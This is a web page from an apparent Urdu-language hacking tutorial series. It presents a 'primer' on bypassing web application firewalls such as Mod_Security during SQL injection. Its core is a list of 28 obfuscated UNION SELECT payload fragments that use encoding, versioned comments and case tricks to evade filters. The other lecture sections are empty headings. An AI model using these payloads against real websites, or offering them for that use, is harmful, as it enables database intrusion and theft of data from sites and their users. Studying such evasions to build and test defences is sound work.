Hello Readers, Whats Up GentelMen?? Everything Fine??

Ah I Hope its Fine :)

As You Guyz Know That in My Evry Primer I've Started From Very Basics and Then Moved Toward Advanced Techniques and it Depends on the Structure of Target Method That if I Have to Explain it or Do it Practically , So Here is Now SQL INJECTION WEB APPLICATION FIREWALLS BYPASSING, and I Hope You Guyz Will Like it Very Much :)

So Lets Start Without Wasting Time,, Right?? Ook ..

Hands on: Lets Begin

KEEP IN MIND THAT THESE WAF's ACTUALLY DEPEND ON SCENARIO THAT HOW WE HAVE TO USE THEM

Lecture #1

IntroDuction to WAFs and Why We Have to ByPASS Them?

Lecture #2

ByPassing Mod_Security and Some Common Union Select Queries

Some Common Union Select Queries are Given Below Which Can be usually Used .

1. %55nion(%53elect 1,2,3)-- -
2. +union+distinct+select+
3. +union+distinctROW+select+
4. /**//*!12345UNION SELECT*//**/
5. /**//*!50000UNION SELECT*//**/
6. /**/UNION/**//*!50000SELECT*//**/
7. /*!50000UniON SeLeCt*/
8. union /*!50000%53elect*/
9. +#uNiOn+#sEleCt
10. +#1q%0AuNiOn all#qa%0A#%0AsEleCt
11. /*!%55NiOn*/ /*!%53eLEct*/
12. /*!u%6eion*/ /*!se%6cect*/
13. +un/**/ion+se/**/lect
14. uni%0bon+se%0blect
15. %2f**%2funion%2f**%2fselect
16. union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
17. REVERSE(noinu)+REVERSE(tceles)
18. /*--*/union/*--*/select/*--*/
19. union (/*!/**/ SeleCT */ 1,2,3)
20. /*!union*/+/*!select*/
21. union+/*!select*/
22. /**/union/**/select/**/
23. /**/uNIon/**/sEleCt/**/
24. /**//*!union*//**//*!select*//**/
25. /*!uNIOn*/ /*!SelECt*/
26. +union+distinct+select+
27. +union+distinctROW+select+
28. uNiOn aLl sElEcT 

Demonstration:

Lecture #3

WAF ByPass Using SQLMAP

To Be Continued..!!!

SQLi WAF ByPASSing Primer - UrduSecurity Project

Uploaded by: Adeel Chaudhary

Views:

336

Category: Learn Hacking in Urdu, Muhammad Adeel, SQL Ijection, sql injection waf, sqli waf bypass, SQLi Waf Bypassing By UrduSec, UrduSec, UrduSecurity, web application firewall

Share

Tweet